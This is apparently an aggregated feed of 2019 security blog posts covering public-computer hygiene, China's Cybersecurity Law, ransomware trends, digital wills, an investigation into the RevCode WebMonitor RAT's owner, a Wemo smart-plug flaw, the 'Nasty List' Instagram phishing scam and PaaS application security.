The PDF file shown above was left behind when I read an email using my ISP’s webmail interface.

Other than finding and deleting information left behind, my use of public computers is limited to reading online articles, checking the weather, and performing internet searches. What personal information you are willing to leave behind on a public computer depends on your risk tolerance. But it’s important to note that accessing corporate data on public computers could result in an inadvertent violation of company policies involving confidential data.

Although I still find public computers running Windows XP, there is a growing shift in the hospitality industry to use Kiosk applications. These provide limited functionality combined with locked-down security configurations. Access to the start menu is not possible and functionality is limited to desktop applications. Printing of boarding passes is a common allowed application. Reading web email is sometimes allowed, though I don’t recommend it because it requires entering a password. The risk of password compromise may be low, but the value of practicing quality security habits leads me to advise against it. If you must, consider changing your email password the next time you log onto a private computer.

If you happen to be using a public computer without a Kiosk interface, would you be so kind as to copy this blog, paste it into a Word document, and save it on the public computer to help inform the next user? They may end up paying it forward.

The post Notice: What Happens on Public Computers, Stays on Public Computers appeared first on Webroot Blog.

The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

While many of us were focused on the European Union’s GDPR and California’s Consumer Privacy Act (CCPA), the giant on the other side of the world implemented China’s Cybersecurity Law (CSL) in June 2017. While CSL laid out broad data protection principles, there were noticeable gaps related to implementation and overall scope. To operationalize and further clarify CSL scope, the Chinese government instituted six systems: the Internet Information Content Management System; the Cybersecurity Multi-Level Protection System (MLPS); the Critical Information Infrastructure Security Protection System; the Network Products and Services Management System; the Cybersecurity Incident Management System; and the Personal Information … Continue reading The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

The post The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations appeared first on TrustArc Blog.

Effective Endpoint Security Strategy 101

Every organization wants to expedite processes, reduce costs, and bolster their staff. In today’s modern digital world, these objectives are largely attainable, but they can occasionally come with unwanted side effects. With all the devices an organization uses to achieve its business goals, things can occasionally get lost in the shuffle, and cybersecurity issues can emerge as a result. Balancing your business objectives while ensuring your organization’s data is secure can be a challenge for many. But that challenge can be eased by addressing cyberthreats at the start – the endpoint. Adopting an effective endpoint protection strategy is crucial for a modern-day organization and defines a strong security posture. In fact, the importance of endpoint security has even caught the eye of venture capital firms, which are investing billions a year in the cybersecurity sector. But what exactly are the components of a successful endpoint security strategy? Let’s break it down.

Ensure the Basics Are in Place

If there’s one thing my previous experience with consumer security has taught me, it’s that the proliferation of connected devices is showing no signs of slowing. The same goes for the connected devices leveraged by businesses day in and day out. Organizations often give multiple devices to their workers, which are used to communicate and which contain crucial business-specific information. These devices are used by employees who go just about anywhere and do just about everything, so it’s important that businesses equip their people with the tools they need to protect these devices and the data they store.

The first important tool – VPNs, or Virtual Private Networks. The modern workforce is a mobile one, and professionals everywhere are carrying their devices with them as they travel and connect to public Wi-Fi networks. Public Wi-Fi networks are not typically the most secure, and VPNs can help ensure those mobile devices connect securely to avoid potentially exposing data.

These devices should always have strong authentication as well, which acts as the first line of defense for any security issues that arise. Remind everyone that their devices should be locked with a strong and complex password that acts as the gatekeeper for their device. That way, the company will be protected if that individual endpoint device becomes lost or stolen.

Empower Your Employees to Do Their Part

One of the most important tools to equip your employees with is proper security training. In order to keep endpoint devices safe and networks secure, employees should undergo regular security training sessions. This training should keep everyone up-to-date on the latest threats, the necessary precautions they need to take when browsing the web, and how their individual devices can impact an organization’s network.

One main point to hit upon during employee security training – the importance of updates. Updating your device software can feel like a menial task, but the seriousness of the ask cannot be overstated. Outdated software was the cause of the WannaCry global cyberattack, and keeping software current will remain a differentiator when attacks do come after individual endpoint devices.

Make Predictive Technology an Essential

Now, in order to anticipate major cyberattacks like WannaCry, adopting predictive technology for your endpoint security strategy is of the utmost importance, as these innovations can be used to guide your incident response strategy. Take it from hundreds of IT professionals, who in a recent SANS survey expressed that predictive technologies – such as machine learning (ML) and artificial intelligence (AI) – are required in order to move from matching already-known bad elements to identifying abnormal behavior.

ML and AI technology are also particularly crucial for visibility. This technology can empower security teams to gain insight into their endpoint detection and response systems, which automatically reduces the time required to address threats. Therefore, businesses need to have this predictive technology in place to anticipate and quickly gain insight into all threats affecting their organization’s network.

Adopt Innovative Technology

For those unsure where to start when it comes to AI and ML, there’s good news – there are actually endpoint security solutions out there that have predictive technology included in their build. Solutions such as McAfee MVISION Mobile and McAfee MVISION Endpoint have machine learning algorithms and analysis built into their architecture to help identify malicious behavior and attack patterns affecting endpoint devices.

Innovative solutions such as these will act as the cherry on top of your endpoint security strategy. So, it is crucial to take the time to invest in the right technology, irrespective of the nature of your enterprise. By creating the right combination of process and product, your organization’s network will be secure, and you won’t have to pick between business growth and a healthy security posture.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business, and read more in our latest paper: Five Ways to Rethink Your Endpoint Protection Strategy.

The post Effective Endpoint Security Strategy 101 appeared first on McAfee Blogs.

UK-based organisations are getting better at preventing ransomware

The UK is one of the few countries that has seen a year-on-year reduction in ransomware attacks, a new study has found.

According to the 2019 SonicWall Cyber Threat Report, ransomware infections in the UK decreased by 59% in the past year, a stark contrast to the 11% increase globally.

Has the UK learned a lesson?

Several experts believe the UK’s astounding resilience to ransomware is a direct result of 2017’s WannaCry attack. The ransomware tore through organisations across the globe but struck most acutely in the UK – at the NHS in particular.

The attack did little to demonstrate the financial appeal of ransomware for crooks. The incident became so high profile that most organisations learned that it wasn’t worth paying the ransom, and those behind the attack struggled to recoup the money that was paid into their Bitcoin account.

Likewise, the attack didn’t provide an accurate reflection of how incidents normally play out. The malware is usually most successful when it stays under the radar and catches out organisations that lack backup protocols, thereby seemingly forcing them to comply with the blackmailer’s request.

However, WannaCry taught the UK two huge lessons – that ransomware is dangerous and that organisations need to plan for it.

Bill Conner, president and CEO of SonicWall, said that, following WannaCry, “you guys [the UK] were all over [ransomware].”

The attack prompted the UK government, along with the National Cyber Security Centre and UK-based businesses, to confront ransomware head on.

“Most of the vendors in the UK and their customers put solutions in place to protect against multiple family variants of ransomware,” said Conner.

Ransomware solutions

There are two key steps to protecting your organisation from ransomware. First, you should regularly back up your important files. This enables you to delete infected files and restore them from backups.

The process will take a long time – often more than 24 hours – but the loss in productivity will almost certainly be less costly than paying a ransom. Plus, you need to factor in issues other than simply the cost of returning to business. There’s the possibility that crooks won’t keep their word once you’ve paid up. Equally, there’s the risk that complying with their demands has made you a target for future attacks.

It’s therefore always advisable to use backups where possible rather than paying a ransom.

Of course, it’s even better if you don’t get infected at all, and the best way to do that is to boost staff awareness of ransomware. That brings us to the second key step to protecting your organisation.

Most ransomware (and malware generally) is delivered via phishing scams. Cyber criminals plant the malicious code in an attachment and trick employees into downloading it. If you can train your staff to spot a malicious email and report it, you can dramatically reduce the risk of becoming infected.

Get started with staff awareness

Our Phishing and Ransomware – Human patch e-learning course makes staff awareness training simple.

This ten-minute course introduces employees to the threat of phishing and ransomware, and describes the link between the two. Armed with this knowledge, your staff will be able to detect suspicious emails and know how to respond.

The post UK-based organisations are getting better at preventing ransomware appeared first on IT Governance Blog.

TrustArc Recognized as 2019 Bay Area Best Places to Work

TrustArc, the leading data privacy management company, has been recognized as a winner of the 2019 Bay Area Best Places To Work, an awards program presented by the San Francisco Business Times and the Silicon Valley Business Journal! Select employers from the Bay Area were named winners of the awards program, held on April 18, 2019. These winning organizations were honored for having created exceptional workplaces that their employees value highly. Award applicants were evaluated and ranked across five categories according to the number of Bay Area employees. The ranking found companies in the region whose employees rate them as … Continue reading TrustArc Recognized as 2019 Bay Area Best Places to Work

The post TrustArc Recognized as 2019 Bay Area Best Places to Work appeared first on TrustArc Blog.

Veracode Is Named a Leader for Sixth Time in Gartner Magic Quadrant for Application Security Testing

Veracode has been named a Leader in the Gartner Inc. 2019 Magic Quadrant for Application Security Testing, marking our sixth year as a Leader.

We’re excited to again be recognized as a Leader in the industry. We believe Gartner continues to place Veracode in this position because of our vision in application security testing and our ability to cover the entire software development lifecycle (SDLC), from code to deployment, with services and support that help development teams with challenges, and a new analytics engine that shows performance in real-time.

It has been an incredible start to the year – customers are scanning more applications than ever before with Veracode, and are achieving unprecedented results with their AppSec programs. We’re dedicated to helping companies achieve a frictionless SDLC in which security and development teams work in collaboration without slowing down business outcomes.

The AppSec market is growing at a rapid pace, and far more quickly than other security sectors.

The report’s authors, Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, state in the report: "Through 2022, the AST market is projected to have a 10% compound annual growth rate (CAGR). This continues to be a fast-growing segment in the information security space, which itself is expected to grow at a five-year CAGR of 9%. The AST market size is estimated to reach $1.15 billion by the end of 2019."1

It’s not difficult to understand why: 111 billion lines of new code are written each year, a figure that will only go up because software powers the world around us. That software is constantly being updated, and it must be kept secure to prevent vulnerabilities from being exploited by both sophisticated and simplistic attacks. A further layer of complexity arises when you take into account compliance with privacy regulations such as GDPR and industry standards such as PCI DSS, which require companies to have policies and practices in place to protect data.

Companies across industries are changing how they create and use software, seeking a competitive edge by taking modern approaches such as DevSecOps, Agile, microservices, cloud native apps, and APIs. However, these changes mean that organizations face even greater challenges to secure software that is being created rapidly and in new environments.

Veracode has redoubled its efforts to bring innovative products to customers to help them not only meet the challenges they encounter, but also to make secure software one of the reasons they are emboldened to change the world. Our solutions are designed for developers to excel at their jobs while coding securely.

We recently enhanced our platform with accelerated dynamic application security testing (DAST) built on a new, scalable architecture that simplifies deployment. With Veracode DAST, customers can configure scans of internal applications running in the cloud, in containers, on virtual machines or on bare metal; customize scans to meet organizational compliance requirements; and scan multiple applications through a single endpoint.

In addition, our focus on developer needs remains a core value at Veracode:

  • Veracode’s Software Composition Analysis (SCA) offering currently covers more than 1.9 million different and unique open source libraries, and almost 17.3 million different versions of those libraries.
  • Veracode Greenlight finds security defects in your code in seconds so you can fix findings directly in the IDE.
  • We support more than 100 languages and frameworks, including support for Go, Scala, and Python.

The thinking around software security is changing – is your company changing with it?

To download the 2019 Gartner Magic Quadrant for Application Security Testing, please visit here.

1. Gartner, Inc.  “Magic Quadrant for Application Security Testing” by Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, April 18, 2019.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets

We were still in shock over the sudden demise of a dear family friend. But the bereaved family had no time for grieving. The gentleman had not left any will and no one had any clear idea about his financial and physical assets. The family was running from pillar to post, trying to sort out the mess.

“Tomorrow, you and I will go meet our lawyer and find out how to draw up our will. I want us to leave everything in order, with specific instructions, so that there are no complications for the kids later,” announced my spouse one fine morning.

I readily agreed; however, I had a question.

“OK, but what about our digital assets?”

The spouse looked confused and so I continued, “Shouldn’t we also make arrangements for how we want our digital assets to be handled post our decease?”

Most of us in the age group of 40-60 years are active in the digital world in a big way, with multiple online accounts- from social media, banking, travel booking, trading, e-mail, e-transaction to blogs, e-wallets and home service. We share personal photos and videos online. We also deal with virtual currency, the records of which are stored online. The sum of all this digital data is loosely termed as our digital asset.

You may wonder what the big deal is about a will for digital assets, since some of them have no monetary value. First, it identifies your legal successor, the person who can take decisions about your online accounts. Without it, your beneficiaries will have to run around searching for passwords, filling in forms and submitting requests in various places. Second, your family needs to know about any outstanding bills you may have received by email or through a credit card program, and about any payments due to you.
A will that lists all your accounts, says where the credentials for them are kept, and details what you want done with each digital asset will make it much easier for your beneficiaries to take the right actions. One caveat: a will can become a public record once it goes through probate, so keep the usernames and passwords themselves in a separate sealed document or in a password manager’s emergency-access feature, and have the will point to that rather than spelling the passwords out. Done this way, your family can keep receiving the payments from your online investments, or even the payments from your blog site!

Prepare ahead

You can take any of these three steps:

a- Explain to your family about all your online accounts and passwords

b- Write down all details in a diary and keep it where it can be easily found

c- Create a will outlining your wishes and specifications regarding your digital assets

The first two options call for sharing passwords beforehand, something you may not be comfortable with. So the third option is the best available. Go for it, and your dear ones will bless you for your foresight.

Be proactive about your online presence

  • There may be content on your accounts you would not want others to see. We all create or download content that we would like to keep private. The best thing to do is to regularly sanitize your accounts and delete what you don’t want others to see.
  • Inactive accounts and profiles are much in demand: cyber criminals want access to inactive accounts to create false IDs and fake profiles. They can also create problems for the friends and families of the users.

While most of our generation limit themselves to a handful of social media accounts, below are a few handy guidelines for securing the key ones:

Facebook

The social media giant lets you appoint a legacy contact who can either memorialize the account or have it deleted permanently. Facebook will not hand login information to the family, though.

Instagram

Just like Facebook, Instagram too offers the option of either getting an account deleted or memorialized, after they receive a valid request. They also pledge to take measures to protect the privacy of the deceased person by securing the account.

YouTube

YouTube does not yet offer any facility for preserving or deleting content created by users. In fact, it regularly deletes inactive or dead accounts, which is quite understandable, given the huge volumes of uploads per minute.

Twitter

It allows legal successors to place request for deactivation of the account. They will guide you through the process, which is similar to that of Facebook and Instagram.

LinkedIn

The legal successors/family members need to approach them with certain information and fill out a form shared on their site. They will then close the account and remove the profile.

Google

Sign into Google -> My Account -> Personal Info & Privacy -> Inactive Account Manager -> setup. Then add up to 10 trusted people who will be notified if you have been inactive for a specified period. You can leave them a last message and they can also download the data that you have chosen to share with them – like emails, passwords saved by Google, photos in Drive etc.

Or else, you can ask Google to delete your entire account after a certain amount of inactivity.

Microsoft including Outlook

Similarly, legal successors can inform Microsoft to close down the account and download any information you may have chosen to share with them.

In conclusion

So, you see if you leave everything written and registered in your will, your dear ones will have less to bother about. Also, it’s our duty as well, for this is the digital world and we are the digital natives. It is about time we start doing things right in cyberspace too so as to not leave behind a legacy of clutter, confusion and possible cybercrime.

Always keep your devices secured with advanced security tools like McAfee Total Protection so that cyber criminals don’t get to your data before your heirs do.

The post Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets appeared first on McAfee Blogs.

How Business can address the Security Concerns of Online Shoppers

It’s no secret that cybersecurity is an epidemic problem that affects online businesses on a global scale. E-commerce businesses are especially affected by data breaches because it weakens the consumer’s trust in online businesses to protect their personal data. In response to the growing number of breaches, governments and enterprises alike are stepping up to the plate to provide sustainable solutions to the problem.

The UK is aiming to become a world leader in cybersecurity by investing a substantial amount of money (to the tune of £70 million) in the Industrial Strategy Challenge Fund. The fund represents the government’s commitment to increase funding in research and development by £4.7 billion over a four year period. One of the primary goals of the investment will be to supply the industry with the money necessary to design and develop state-of-the-art hardware that’s more secure and resilient to common cyber threats.

The logic stems from the fact that cybercriminals are constantly finding new ways to exploit current technology, so the best way to combat future attacks is to design chips and hardware with stronger security features built into them to outpace cyber threats. However, this means businesses will have to invest in new IT systems as it rolls out to keep their security measures up to par.

For the time being, online business owners need to do everything in their power to address the privacy concerns of their users. In some cases, this might mean investing in more secure and modern e-commerce platforms that offer security features, such as TLS (still commonly known as SSL) protection and security software to protect against malware attacks, or simply generating new, strong admin passwords on a regular basis.

The fact is, there is no way to give customers a 100% guarantee that their personal data is safe, but there are actions webmasters and companies can take to make their websites a lot safer for customers to use. To help you learn more about how you can secure your site from cyber threats, Wikibuy has laid out 15 steps in the infographic below.


How Business Owners Can Address Online Shopping Concerns

Who’s Behind the RevCode WebMonitor RAT?

The owner of a Swedish company behind a popular remote administration tool (RAT) implicated in thousands of malware attacks shares the same name as a Swedish man who pleaded guilty in 2015 to co-creating the Blackshades RAT, a similar product that was used to infect more than half a million computers with malware, KrebsOnSecurity has learned.

An advertisement for RevCode WebMonitor.

At issue is a program called “WebMonitor,” which was designed to allow users to remotely control a computer (or multiple machines) via a Web browser. The makers of WebMonitor, a company in Sweden called “RevCode,” say their product is legal and legitimate software “that helps firms and personal users handle the security of owned devices.”

But critics say WebMonitor is far more likely to be deployed on “pwned” devices, or those that are surreptitiously hacked. The software is broadly classified as malware by most antivirus companies, likely thanks to an advertised feature list that includes dumping the remote computer’s temporary memory; retrieving passwords from dozens of email programs; snarfing the target’s Wi-Fi credentials; and viewing the target’s Webcam.

In a writeup on WebMonitor published in April 2018, researchers from security firm Palo Alto Networks noted that the product has been primarily advertised on underground hacking forums, and that its developers promoted several qualities of the software likely to appeal to cybercriminals looking to secretly compromise PCs.

For example, RevCode’s website touted the software’s compatibility with all “crypters,” software that can encrypt, obfuscate and manipulate malware to make it harder to detect by antivirus programs. Palo Alto also noted WebMonitor includes the option to suppress any notification boxes that may pop up when the RAT is being installed on a computer.

A screenshot of the WebMonitor builder panel.

RevCode maintains it is a legitimate company officially registered in Sweden that obeys all applicable Swedish laws. A few hours of searching online turned up an interesting record at Ratsit AB, a credit information service based in Sweden. That record indicates RevCode is owned by 28-year-old Swedish resident Alex Yücel.

In February 2015, a then 24-year-old Alex Yücel pleaded guilty in a U.S. court to computer hacking and to creating, marketing and selling Blackshades, a RAT that was used to compromise and spy on hundreds of thousands of computers. Arrested in Moldova in 2013 as part of a large-scale, international takedown against Blackshades and hundreds of customers, Yücel became the first person ever to be extradited from Moldova to the United States.

Yücel was sentenced to 57 months in prison, but according to a record for Yücel at the U.S. Federal Bureau of Prisons, he was released on Nov. 1, 2016. The first advertisements in hacker forums for the sale of WebMonitor began in mid-2017. RevCode was registered as an official Swedish company in 2018, according to Ratsit.

Until recently, RevCode published on its Web site a value added tax (VAT) number, an identifier used in many European countries for value added tax purposes. That VAT number — first noted by the blog Krabsonsecurity.com (which borrows heavily from this site’s design and banner but otherwise bears no relation to KrebsOnSecurity.com) — has since been removed from the RevCode Web site and from historic records at The Internet Archive. The VAT number cited in that report is registered to Alex Yücel, and matches the number listed for RevCode by Ratsit AB.

Yücel could not be immediately reached for comment. But an unnamed person responded to an email sent to the customer support address listed at RevCode’s site. Presented with the information and links referenced above, the person responding wrote, “nobody working for/with RevCode is in any way related to BlackShades. Anything else suggesting otherwise is nothing but rumors and attempts to degrade our company by means of defamation.”

The person responding from the RevCode support email address contended that the Alex Yücel listed as owner of the company was not the same Alex Yücel convicted of co-authoring Blackshades. However, unless the Ratsit record is completely wrong, this seems unlikely to be true.

According to the Ratsit listing, the Alex Yücel who heads RevCode currently lives in a suburb of Stockholm, Sweden with his parents Can and Rita Yücel. Both Can and Rita Yücel co-signed a letter (PDF) in June 2015 testifying to a New York federal court regarding their son’s upstanding moral character prior to Yücel the younger’s sentencing for the Blackshades conviction, according to court records.

A letter from Alex Yücel’s parents to the court in June 2015.

McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs

*This blog is originally from August 2018 and was updated April 2019*

From connected baby monitors to smart speakers, IoT devices are becoming commonplace in modern homes. Their convenience and ease of use make them seem like the perfect gadgets for the whole family. However, users tend to put basic security hygiene on the back burner when they get a shiny new IoT toy: applying security updates, using complex passwords for home networks and devices, and isolating critical devices or networks from IoT. On top of that, the poor security standards of many IoT devices make them convenient targets for cybercriminals, who constantly track flaws they can weaponize. Every new IoT device that reaches the market is a new opportunity for them to find its weaknesses and gain access to user networks. Our McAfee Labs Advanced Threat Research team uncovered exactly such a flaw in one of these devices: the Wemo Insight Smart Plug, a Wi-Fi–connected electric outlet.

Once our research team had worked out exactly how the device was vulnerable, they leveraged the flaw to test out a few types of cyberattack. The team found that an attacker could use the vulnerability to turn the switch off or overload it, which could overheat circuits or cut a home’s power. What’s more, this smart plug, like many vulnerable IoT devices, creates a gateway through which an attacker can compromise the entire home Wi-Fi network. Using the Wemo as a sort of “middleman,” our team leveraged this hole in the network to power a smart TV on and off, which was just one of many things that could have been done.

And as of April 2019, the potential of a threat born from this vulnerability seems as possible as ever. Our ATR team even has reason to believe that cybercriminals already have or are currently working on incorporating the unpatched Wemo Insight vulnerability into IoT malware. IoT malware is enticing for cybercriminals, as these devices are often lacking in their security features. With companies competing to get their versions of the latest IoT device on the market, important cybersecurity features tend to fall by the wayside. This leaves cybercriminals with plenty of opportunities to expose device flaws right off the bat, creating more sophisticated cyberattacks that evolve with the latest IoT trends.

Our researchers reported this vulnerability to Belkin and, almost a year after initial disclosure, are still awaiting a follow-up. Whether or not you are a Wemo user, it is important to take proactive security steps to safeguard all your IoT devices. Start by following these tips:

  • Keep security top of mind when buying an IoT device. When you’re thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the device in question’s security standards. A simple Google search on the product, as well as the manufacturer, will often do the trick.
  • Change default passwords and do an update right away. If you purchase a connected device, first and foremost change the default password. Default manufacturer passwords are easy for criminals to crack. Your device’s software will also need to be updated at some point; in a lot of cases, devices have updates waiting for them as soon as they are taken out of the box. The first time you power up your device, check whether there are any updates or patches from the manufacturer.
  • Keep your firmware up-to-date. Manufacturers often release software updates to protect against these potential vulnerabilities. Set your device to auto-update, if you can, so you always have the latest software. Otherwise, just remember to consistently update your firmware whenever an update is available.
  • Secure your home’s internet at the source. These smart home devices must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs appeared first on McAfee Blogs.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution when inspecting links sent to you in messages. Always inspect a URL before you click on it. In the case of this scam, the link is clearly not Instagram’s: the domain the fake login page is served from is not instagram.com, and it ends in [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

Our PaaS App Sprung a Leak

Many breaches start with an “own goal,” an easily preventable misconfiguration or oversight that scores a goal for the opponents rather than for your team. In platform-as-a-service (PaaS) applications, the risk profile of the application can lure organizations into a false sense of security. While overall risk to the organization can be lowered, and new capabilities otherwise unavailable can be unlocked, developing a PaaS application requires careful consideration to avoid leaking your data and making the task of your opponent easier.

PaaS integrated applications are nearly always multistep service architectures, leaving behind the simplicity of yesterday’s three-tier presentation/business/data logic applications and basic model-view-controller architectures. While many of these functional patterns are carried forward into modern applications—like separating presentation functions from the modeled representation of a data object—the PaaS application is nearly always a combination of linear and non-linear chains of data, transformation, and handoffs.

As a simple example, consider a user request to generate a snapshot of some kind of data, like a website. They make the request through a simple portal. The request would start a serverless application, which applies basic logic, completes information validation, and builds the request. The work goes into a queue—another PaaS component. A serverless application figures out the full list of work that needs to be completed and puts those actions in a list. Each of these gets picked up and completed to build the data package, which is finally captured by another serverless application to an output file, with another handoff to the publishing location(s), like a storage bucket.

Planning data interactions and the exposure at each step in the passing process is critical to the application’s integrity. The complexity of PaaS is that the team must consider threats both for each script/step at a basic level individually as well as holistically for the data stores in the application. What if I could find an exploit in one of the steps to arbitrarily start dumping data? What if I found a way to simply output more data unexpectedly than it was designed to do? What if I found a way to inject data instead, corrupting and harming rather than stealing?

The familiar threats of web applications are present, and yet our defensive posture is shaped by which elements of the applications we can see and which we cannot. Traditional edge and infrastructure indicators are replaced by a focus on how we constructed the application and how to use cloud service provider (CSP) logging together with our instrumentation to gain a more holistic picture.

In development of the overall application, the process architecture is as important as the integrity of individual technical components. The team leadership of the application development should consider insider, CSP, and external threats, and consider questions like:

  • Who can modify the configuration?
  • How is it audited? Logged? Who monitors?
  • How do you discover rogue elements?
  • How are we separating development and production?
  • Do we have a strategy to manage exposure for updates through blue/green deployment?
  • Have we considered the larger CSP environment configuration to eliminate public management endpoints?
  • Should I use third-party tools to protect access to the management plane of the cloud development and production environments, such as a cloud access security broker (CASB), together with the cloud environment’s own tools to enumerate accounts and scan for common errors?

In the PaaS application construction, the integrity of basic code quality is magnified. The APIs and/or the initiation processes of serverless steps are the gateway to the data and other functions in the code. Development operations (DevOps) security should use available sources and tools to help protect the environment as new code is developed and deployed. These are a few ways to get your DevOps team started:

  • Use the OWASP REST Security Cheat Sheet for APIs and code making calls to other services directly.
  • Consider deploying tools from your CSP, such as the AWS Well-Architected Tool on a regular basis.
  • Use wrappers and tie-ins to the CSP’s PaaS offering, such as AWS Lambda Layers, to package the code for critical operational steps once and use it to implement key security checks (input validation, logging) consistently across every function.
  • Use integrated automated fuzzing/static test tools to discover common missteps in code configuration early and address them as part of code updates.
  • Consider accountability expectations for your development team. How are team members encouraged to remain owners of code quality? What checks are necessary to reduce your risk before considering a user story or a specific implementation complete?

The data retained, managed, and created by PaaS applications has a critical value—without it, few PaaS applications would exist. Development teams need to work with larger security functions to consider the privacy requirements and security implications and to make decisions on things like data classification and potential threats. These threats can be managed, but the specific countermeasures often require a coordinated implementation between the code to access data stores, the data store configuration itself, and the dedicated development of separate data integrity functions, as well as a disaster recovery strategy.

Based on the identified risks, your team may want to consider:

  • Using data management steps to reduce the threat of data leakage (such as limiting the amount of data or records which can be returned in a given application request).
  • Looking at counters, code instrumentation, and account-based controls to detect and limit abuse.
  • Associating requests to specific accounts/application users in your logging mechanisms to create a trail for troubleshooting and investigation.
  • Recording data access logging to a hardened data store, and if the sensitivity/risk of the data store requires, transition logs to an isolated account or repository.
  • Asking your development team what the business impact of corrupting the value of your analysis, or the integrity of the data set itself might be, for example, by an otherwise authorized user injecting trash?

PaaS applications offer compelling value, economies of scale, new capabilities, and access to advanced processing otherwise out of reach for many organizations in traditional infrastructure. These services require careful planning, coordination of security operations and development teams, and a commitment to architecture in both technical development and managing risk through organizational process. Failing to consider and invest in these areas while rushing headlong into new PaaS tools might lead your team to discover that your app has sprung a leak!

The post Our PaaS App Sprung a Leak appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s –– Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were fewer than one billion IoT devices in use around the world. In 2019, that number is projected to skyrocket past eight billion by the end of the year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. Every one of these devices creates another access point into the smart home, which is comparable to leaving a back door unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, one that will continue to grow to fit not only evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and “Like” us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

Seqrite mSuite can be the perfect solution for the education industry

Estimated reading time: 3 minutes

While financial institutions like banks or other multinational corporations (MNCs) occupy the bulk of headlines when it comes to topics like cybersecurity and data breach, it would be foolish to disregard the threats that organizations in the education industry face. Consider the sheer scale of the kind of information a school, college or any other educational institution receives and stores. At the very least, this data will contain names, addresses, personal credentials, financial details, photos, medical information for potentially thousands of students and teachers. That is a massive amount of Personally Identifiable Information (PII).

Ultra-sensitive data

The nature of the data will most likely be ultra-sensitive. Educational institutes are attended by young students, some possibly even underage. This is extremely precarious data which can be dangerous and can ruin lives and families in the wrong hands. This is also exactly the kind of information an attacker would want in order to replicate cyber identities for other types of crime. Attackers are also likely to target these types of organizations for two major reasons: i) hackers sometimes correctly estimate that these organizations do not give cybersecurity its due importance, and ii) the kind of information educational institutes store is a veritable goldmine for them.

Hence, it is critical for educational sector organizations to invest in strong cybersecurity solutions, especially when it comes to mobile devices. As educational organizations get more connected, the number of entry points through which a hacker can enter a closed network increases.

